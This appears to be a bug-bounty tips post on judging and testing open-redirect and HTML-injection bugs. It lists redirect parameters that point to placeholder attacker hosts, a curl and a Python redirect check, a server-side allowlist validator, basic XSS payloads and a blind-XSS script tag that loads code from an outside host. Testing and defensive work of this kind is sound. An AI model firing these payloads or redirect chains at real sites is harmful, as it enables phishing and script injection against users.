Open Redirect vs HTML Injection: Bug Bounty Insights

The discussion revolves around the validity of Open Redirect and HTML Injection vulnerabilities in bug bounty programs, particularly on platforms like HackerOne and Bugcrowd.

Key Points:

  1. Open Redirect is often marked as “Not Applicable” or “Out of Scope” by some programs, but it can still be a valid bug if chained with other vulnerabilities (e.g., phishing attacks).
  2. HTML Injection is generally considered a valid vulnerability across most platforms, especially if it leads to Blind XSS or affects admin panels.

🔗 Reference Report: HackerOne HTML Injection Case

You Should Know:

Testing Open Redirects

To test for Open Redirects, use the following methods:

Manual Testing

Look for URL parameters like:

  • `?redirect=https://evil.com`
  • `?next=//attacker.site`
  • `?url=http://malicious.domain`

Automated Testing with cURL

curl -sI "https://target.com/redirect?url=https://evil.com" | grep -i "location:"

Python Script to Check Open Redirects

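import requests

# Request the redirect endpoint with an external URL as the target, without
# following the redirect, so the Location header can be inspected directly.
url = "https://target.com/redirect"
params = {"url": "https://evil.com"}
response = requests.get(url, params=params, allow_redirects=False, timeout=10)

# requests exposes response headers case-insensitively.
if "evil.com" in response.headers.get("location", ""):
    print("Open Redirect Found!")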
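
The server-side check that closes the redirect parameters listed above, as an added example (not code from the original post). The `ALLOWED_HOSTS` allowlist and the names `is_safe_redirect` and `classify` are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Assumption for this example: the only hosts the application may redirect to.
ALLOWED_HOSTS = frozenset({"target.com", "www.target.com"})


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for same-site absolute paths or https URLs on allowlisted hosts."""
    if not target or target != target.strip():
        return False
    # Browsers treat "\" as "/" and drop tab/CR/LF inside URLs; reject these
    # outright instead of guessing how each client normalises them.
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return False
    try:
        parts = urlsplit(target)
        host = parts.hostname
    except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
        return False
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept "/account" but not "//attacker.site" or
        # "///host", which browsers resolve to another origin.
        return target.startswith("/") and not target.startswith("//")
    # Absolute or protocol-relative URL: https only, exact host match, so
    # "target.com.evil.com" and "target.com@evil.com" both fail.
    return parts.scheme == "https" and host in allowed_hosts


# Constructed sample values: the three parameter values listed above, two
# legitimate targets, and inputs a prefix or substring check would accept.
SAMPLES = [
    "https://evil.com", "//attacker.site", "http://malicious.domain",
    "/account/settings", "https://target.com/home",
    "https://target.com.evil.com/", "https://target.com@evil.com/",
    "/\\evil.com", "javascript:alert(1)",
]


def classify(samples=SAMPLES):
    """Map each candidate redirect target to allow/deny."""
    return {s: "allow" if is_safe_redirect(s) else "deny" for s in samples}


if __name__ == "__main__":
    for value, verdict in classify().items():
        print(f"{verdict:5}  {value}")
```

Call `is_safe_redirect()` on the parameter value before issuing the redirect and fall back to a fixed default page when it returns False.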

Testing HTML Injection

If an endpoint allows HTML Injection, test for XSS or DOM-based attacks.

Basic Payloads

"><script>alert(1)</script> 
<img src=x onerror=alert(1)> 

Using Burp Suite

1. Intercept a request containing user input.

2. Inject HTML payloads and observe reflection.

Automated Scanning with XSS Hunter

Use XSS Hunter payloads to detect blind XSS:
<script src="https://xsshunter.com/xss.js"></script> 

What Undercode Say

Open Redirects are often underestimated but can be dangerous when combined with other flaws. HTML Injection, on the other hand, is a more direct threat, especially if it leads to stored XSS or privilege escalation.

Relevant Linux/Windows Commands

  • Linux (Check Network Redirects)
    tcpdump -i eth0 'tcp port 80 and host target.com' -w redirects.pcap 
    
  • Windows (Check URL Handling)
    Get-ItemProperty "HKCU:\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice"
    

Expected Output:

A detailed report on whether the vulnerability is exploitable and its potential impact.

Prediction

As bug bounty programs evolve, Open Redirects may gain more recognition when used in multi-step attacks, while HTML Injection will remain a critical finding due to its direct exploitation potential.

Reported By: Raj Dip – Hackers Feeds